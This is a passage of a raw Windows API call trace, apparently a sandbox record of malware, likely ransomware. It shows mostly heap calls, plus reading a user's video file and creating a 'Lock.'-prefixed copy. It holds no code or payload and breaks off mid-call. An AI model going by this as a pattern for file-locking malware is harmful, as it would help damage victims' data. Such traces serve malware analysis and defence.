RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0257.780] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0257.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0257.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.780] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.781] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.781] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.781] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.781] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/7qrN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\7qrn.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0257.781] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0257.782] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0257.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0257.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.782] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0257.782] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0257.782] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0257.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0257.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x249c7b0 [0257.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0257.784] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos")) returned 0x11 [0257.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0257.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0257.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0257.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3561010 [0257.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0257.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0257.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/Lock.7qrN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lock.7qrn.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0257.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0257.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0257.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.785] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0257.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0257.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0257.785] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0257.785] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0257.785] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0257.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0257.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0257.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0257.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0257.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0257.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0257.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0257.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0257.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0257.787] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0257.787] ReadFile (in: hFile=0x2a0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x75ee, lpOverlapped=0x0) returned 1 [0257.789] ReadFile (in: hFile=0x2a0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0257.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0257.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0257.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x75ee) returned 0x3571018 [0257.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0257.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0257.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0257.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0257.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0257.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0257.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0257.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x75ee) returned 0x24b7a48 [0257.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3571018 | out: hHeap=0x25c0000) returned 1 [0257.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.794] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0257.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x75ee) returned 0x3571018 [0257.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0257.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3571018 | out: hHeap=0x25c0000) returned 1 [0257.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0257.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0257.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.795] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0257.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0257.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0257.795] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0257.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0257.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0257.796] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0257.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0257.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0257.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0257.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0257.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0257.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0257.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0257.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x75ee) returned 0x3571018 [0257.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0257.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16e8 [0257.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dc8 [0257.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0257.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0257.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0257.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0257.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa78 [0257.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0257.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0257.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0257.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0257.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0257.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x75ee) returned 0x24bf040 [0257.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0257.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0257.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0257.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0257.799] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0257.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0257.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0257.800] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0257.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.800] HeapFree 